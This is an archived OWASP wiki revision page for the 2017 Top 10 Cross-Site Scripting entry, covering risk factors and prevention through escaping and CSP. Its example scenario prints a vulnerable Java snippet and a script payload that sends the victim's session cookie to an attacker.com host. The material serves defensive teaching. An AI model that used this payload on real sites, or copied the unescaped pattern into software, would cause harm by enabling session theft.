This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Top 10-2017 A7-Cross-Site Scripting (XSS)"

From OWASP
Jump to: navigation, search
(corrected text of 'Example Attack Scenario')
(Correct the abuse scenario. Change the style from prescriptive to descriptive to sustain the Burden of Proof.)
Line 43: Line 43:
 
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=3|year=2017|language=en}}
 
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=howPrevent|position=right|risk=3|year=2017|language=en}}
 
Preventing XSS requires separation of untrusted data from active browser content.
 
Preventing XSS requires separation of untrusted data from active browser content.
# To avoid <u>[[Types_of_Cross-Site_Scripting#Server_XSS|Server XSS]]</u>, the preferred option is to properly escape untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the <u>[[XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet|OWASP XSS Prevention Cheat Sheet]]</u> for details on the required data escaping techniques.
+
# Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve <u>[[Types_of_Cross-Site_Scripting#Server_XSS|Server XSS]]</u> vulnerabilities. The <u>[[XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet|OWASP XSS Prevention Cheat Sheet]]</u> has details on the required data escaping techniques.
# To avoid <u>[[Types_of_Cross-Site_Scripting#Client_XSS|Client XSS]]</u>, the preferred option is to avoid passing untrusted data to JavaScript and other browser APIs that can generate active content. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the <u>[[DOM_based_XSS_Prevention_Cheat_Sheet|OWASP DOM based XSS Prevention Cheat Sheet]]</u>.
+
# Applying context sensitive encoding when modifying the browser document on the client side acts against <u>[[Types_of_Cross-Site_Scripting#Client_XSS|Client XSS]]</u>. <u>[[DOM_based_XSS_Prevention_Cheat_Sheet|OWASP DOM based XSS Prevention Cheat Sheet]]</u> has details specific to client-side input processing.
# For rich content, consider auto-sanitization libraries like OWASP’s <u>[[AntiSamy]]</u> or the <u>[[OWASP Java HTML Sanitizer Project|Java HTML Sanitizer Project]]</u>.
+
# Enabling a <u>[https://en.wikipedia.org/wiki/Content_Security_Policy Content Security Policy (CSP)]</u> and moving inline javascript code to additional files will defend against XSS across the entire site, assuming no other vulnerabilities (such as upload path tampering or download path traversal) exist that would allow placing malicious code in the server files.
# Consider <u>[https://en.wikipedia.org/wiki/Content_Security_Policy Content Security Policy (CSP)]</u> to defend against XSS across your entire site.
 
 
 
  
 
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=3|year=2017|language=en}}
 
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|subsection=example|position=left|risk=3|year=2017|language=en}}
Line 56: Line 54:
 
</span></b>{{Top_10_2010:ExampleEndTemplate}}
 
</span></b>{{Top_10_2010:ExampleEndTemplate}}
  
The attacker modifies the ‘CC’ parameter in his browser to:
+
The attacker manipulates the `CC' parameter in the query string and sends the link to the victim.  Alternatively, the attacker can wait for the victim to visit another vulnerable site that will redirect to the target site.
  
 
{{Top_10_2010:ExampleBeginTemplate|year=2017}}<b><span style="color:red;">
 
{{Top_10_2010:ExampleBeginTemplate|year=2017}}<b><span style="color:red;">

Revision as of 18:40, 31 May 2017

← A2-Broken Authentication
2017 Table of Contents

PDF version

A4-XML External Entities (XXE) →
Threat Agents / Attack Vectors Security Weakness Impacts
App Specific Exploitability
AVERAGE
Prevalence
VERY WIDESPREAD
Detectability
AVERAGE
Impact
MODERATE
Business ?

Consider anyone who can send untrusted data to the system, including external users, business partners, other systems, internal users, and administrators.

Attackers send text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.

XSS flaws occur when an application updates a web page with attacker controlled data without properly escaping that content or using a safe JavaScript API. There are two primary categories of XSS flaws: (1) Stored and (2) Reflected, and each of these can occur on the a) Server or b) on the Client. Detection of most Server XSS flaws is fairly easy via testing or code analysis. Client XSS is very difficult to identify.

Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.

Consider the business value of the affected system and all the data it processes.

Also consider the business impact of public exposure of the vulnerability.

Am I Vulnerable To 'Sensitive Data Exposure'?

You are vulnerable to Server XSS if your server-side code uses user-supplied input as part of the HTML output, and you don’t use context-sensitive escaping to ensure it cannot run. If a web page uses JavaScript to dynamically add attacker-controllable data to a page, you may have Client XSS. Ideally, you would avoid sending attacker-controllable data to unsafe JavaScript APIs, but escaping (and to a lesser extent) input validation can be used to make this safe.

Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, usually using 3rd party libraries built on top of these technologies. This diveristy makes automated detection difficult, particularly when using modern single-page applications and powerful JavaScript frameworks and libraries. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.

How Do I Prevent 'Sensitive Data Exposure'?

Preventing XSS requires separation of untrusted data from active browser content.

  1. Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Server XSS vulnerabilities. The OWASP XSS Prevention Cheat Sheet has details on the required data escaping techniques.
  2. Applying context sensitive encoding when modifying the browser document on the client side acts against Client XSS. OWASP DOM based XSS Prevention Cheat Sheet has details specific to client-side input processing.
  3. Enabling a Content Security Policy (CSP) and moving inline javascript code to additional files will defend against XSS across the entire site, assuming no other vulnerabilities (such as upload path tampering or download path traversal) exist that would allow placing malicious code in the server files.
Example Attack Scenarios

The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:

(String) page += "<input name='creditcard' type='TEXT'
value='" + request.getParameter("CC") + "'>";

The attacker manipulates the `CC' parameter in the query string and sends the link to the victim. Alternatively, the attacker can wait for the victim to visit another vulnerable site that will redirect to the target site.

'><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>'.

This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. Note that attackers can also use XSS to defeat any automated CSRF defense the application might employ. See 2017-A8 for info on CSRF.

References

OWASP

External

← A2-Broken Authentication
2017 Table of Contents

PDF version

A4-XML External Entities (XXE) →

© 2002-2017 OWASP Foundation This document is licensed under the Creative Commons Attribution-ShareAlike 3.0 license. Some rights reserved. CC-by-sa-3 0-88x31.png